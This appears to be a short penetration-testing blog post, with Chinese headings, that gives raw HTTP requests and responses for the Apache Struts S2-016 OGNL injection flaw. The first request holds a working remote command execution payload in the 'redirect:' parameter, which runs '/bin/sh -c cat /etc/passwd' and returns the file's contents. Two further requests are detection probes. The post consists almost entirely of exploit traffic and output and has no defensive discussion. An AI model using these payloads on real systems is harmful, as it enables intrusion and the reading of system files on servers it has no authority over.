Struts S2-016 HTTP Raw TEXT

<!–more–>

利用请求

POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 651

redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{‘/bin/sh’,’-c’,’cat+/etc/passwd’})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D=

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 07:07:30 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/
Content-Language: zh-CN

679
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin

0

检测请求

方式一

POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 251

redirect%3a%24%7b%23resp%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2c%23resp.getWriter%28%29.print%28%27path88%27%2b%27888887%27%29%2c%23resp.getWriter%28%29.flush%28%29%2c%23resp.getWriter%28%29.close%28%29%7d

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 04:00:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: JSESSIONID=71BFE8F3A13562A9853279332266AFEE-n1; Path=/
Content-Language: zh-CN

c
path88888887
0

方式二

POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 29

redirect%3A%24%7B333%2A444%7D

HTTP/1.1 302 Found
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 04:00:24 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: JSESSIONID=479DCA0D5D3BB5C7A7A5F6F2BC015D8F-n1; Path=/
Location: http://192.168.198.133/147852;jsessionid=479DCA0D5D3BB5C7A7A5F6F2BC015D8F-n1
Content-Language: zh-CN

• #CloudScanner
• #Penetration Testing